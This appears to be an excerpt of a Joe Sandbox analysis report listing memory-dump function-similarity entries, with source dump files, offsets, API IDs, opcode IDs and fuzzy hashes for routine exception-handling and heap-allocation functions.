                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFileHeaderRaise
                                                                    • String ID: csm
                                                                    • API String ID: 2573137834-1018135373
                                                                    • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                    • Instruction ID: 44b93b663a6aa0ba5526019e8bbc9721b3ad2c1ad662e49ade59a11356d03c54
                                                                    • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                    • Instruction Fuzzy Hash: F9115B36618B8482EB21DB25F940269B7F0FB89B84F988235DB8D07769DF3DD5528B10
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2420950138.000001F91B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B2F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b2f0000_based.jbxd
                                                                    Similarity
                                                                    • API ID: __std_exception_copy
                                                                    • String ID: ierarchy Descriptor'$riptor at (
                                                                    • API String ID: 592178966-758928094
                                                                    • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                    • Instruction ID: 12d58e62162825b6678fc96f2147152b50582e89d4dce07ae1e50024a1960a1b
                                                                    • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                    • Instruction Fuzzy Hash: D1E08671645B46D0DF019F21E8803E873A1DB68B74B4D91329A5C0A351FA38D1FAC300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421140533.000001F91B350000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B350000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b350000_based.jbxd
                                                                    Similarity
                                                                    • API ID: __std_exception_copy
                                                                    • String ID: ierarchy Descriptor'$riptor at (
                                                                    • API String ID: 592178966-758928094
                                                                    • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                    • Instruction ID: 6e455fe08dabb6746cd39f2e90e98ba0f18bb64f2f3ccc0af80a9d30b65a923e
                                                                    • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                    • Instruction Fuzzy Hash: 0BE08671655B4A90DF059F21E8403E833A5DB58B74B8D9132995C06351FA38D2FAC300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2420950138.000001F91B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B2F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b2f0000_based.jbxd
                                                                    Similarity
                                                                    • API ID: __std_exception_copy
                                                                    • String ID: Locator'$riptor at (
                                                                    • API String ID: 592178966-4215709766
                                                                    • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                    • Instruction ID: 2c017b3d782f72be88e1e8e3640a669b32029c26a4df4c75265d85afbde3653b
                                                                    • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                    • Instruction Fuzzy Hash: 9CE08671605B46C0DF019F21D4803E87361EB68B64B8D9132CA4C0A351EA38D1E9C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421140533.000001F91B350000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B350000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b350000_based.jbxd
                                                                    Similarity
                                                                    • API ID: __std_exception_copy
                                                                    • String ID: Locator'$riptor at (
                                                                    • API String ID: 592178966-4215709766
                                                                    • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                    • Instruction ID: cc24065b10ce2f35dfdedbdd280b833903211c4a38c82bc4138c2a7c5bda13cd
                                                                    • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                    • Instruction Fuzzy Hash: 74E08671616B4A80DF059F21D4402E873A5EB58B64B8D9132C94C06351EA38D2F6C300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 756756679-0
                                                                    • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                    • Instruction ID: 2604c2bf65fef42e8dbb10e5bedcca455ee823efa61a4255f94306f955dce916
                                                                    • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                    • Instruction Fuzzy Hash: 55115B39A0AB5785EA04AF67E9043BA73A2EB89FE0F1C40749E4D53765DE78C4639300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcess
                                                                    • String ID:
                                                                    • API String ID: 1617791916-0
                                                                    • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                    • Instruction ID: f80c6889924318740d7ebbb1830da128f222ad2b51ddedb56959b45f5c95aa5d
                                                                    • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                    • Instruction Fuzzy Hash: 28E06535B066078AE7049F52D80839B36E2FB89F15F08C034CD0907361DF7D84A6D750